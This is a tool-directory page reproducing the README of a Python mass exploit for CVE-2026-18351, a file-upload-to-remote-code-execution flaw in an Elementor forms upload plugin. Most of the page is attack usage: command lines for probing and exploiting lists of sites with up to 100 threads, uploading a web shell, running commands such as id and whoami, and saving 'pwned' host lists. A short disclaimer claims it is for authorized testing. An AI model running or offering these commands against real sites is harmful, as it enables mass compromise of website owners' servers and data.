Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-18351 — Mass exploit tool for CVE-2026-18351, an unauthenticated arbitrary file upload to RCE in Elementor Forms <= 1.6.0, with passive probing, shell upload, and command execution. | Kitploit
Tools/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
Vulnerability ScannersExploitationScripting & AutomationWeb Application ExploitationWeb SecurityPenetration TestingRemote Access ToolPayload Development
GitHub
johenlastgen-jlg/cve-2026-18351

CVE-2026-18351

Mass exploit tool for CVE-2026-18351, an unauthenticated arbitrary file upload to RCE in Elementor Forms <= 1.6.0, with passive probing, shell upload, and command execution.

View Repository
16h 29m agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-18351

Mass exploit tool for CVE-2026-18351 — Unauthenticated Arbitrary File Upload → RCE in Drag and Drop File Upload for Elementor Forms <= 1.6.0.

credit johenlastgen | telegram @johenlastgen | channel @jlgnetworkredirect


Features

  • Passive vulnerability probe (no upload)
  • Full exploit mode with shell upload & RCE confirmation
  • Single target and batch target support
  • Multi-thread support
  • Configurable command execution
  • Full log, vuln-only, and pwned-only output files
  • Request timeout configuration

Requirements

No external dependencies — uses Python standard library only.

root@kitploit:~
python3 --version  # 3.6+

Usage

root@kitploit:~
# Single target — passive check only (no upload)
python3 mass.py --url http://target.com --check

# Single target — exploit with default command (id)
python3 mass.py --url http://target.com --cmd id

# Single target — exploit with custom command
python3 mass.py --url http://target.com --cmd whoami

# Mass targets — passive check
python3 mass.py --list targets.txt --threads 50 --check

# Mass targets — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id

# Mass targets — exploit with timeout tuning
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# Save full log
python3 mass.py --list targets.txt --output results.txt

# Save only vulnerable targets
python3 mass.py --list targets.txt --output-vuln vuln.txt

# Save only confirmed RCE targets
python3 mass.py --list targets.txt --output-pwned pwned.txt

# Combined output
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

Options

OptionDescription
--urlSingle target URL
--list FILEFile containing target URLs (one per line)
--checkPassive probe only — no file upload
--cmd CMDCommand to execute on shell (default: id)
--threads NNumber of concurrent threads (default: 20)
--timeout NPer-request timeout in seconds (default: 10)
--output FILESave full log to file
--output-vuln FILESave only vulnerable target URLs to file
--output-pwned FILESave only confirmed RCE targets to file

Output States

StateMeaning
PWNEDShell uploaded and RCE confirmed
VULN-NO-EXECUpload accepted but shell execution failed
PATCHEDUpload rejected or nonce not found
ERRORNetwork or parse failure

targets.txt Format

One URL per line. Lines starting with # are ignored.

root@kitploit:~
http://target1.com
https://target2.com
# this line is ignored
http://target3.com

Disclaimer

This project is provided solely for authorized security assessments, defensive security research, and vulnerability validation.

By using this software, you confirm that you have explicit authorization to assess the target systems. Unauthorized access to computer systems is prohibited and may violate applicable laws.

The author and contributors do not encourage or condone unauthorized use of this project and assume no responsibility or liability for any misuse, damage, or legal consequences resulting from its use.


Author

JohenLastGen — JLG NETWORK

Download Tool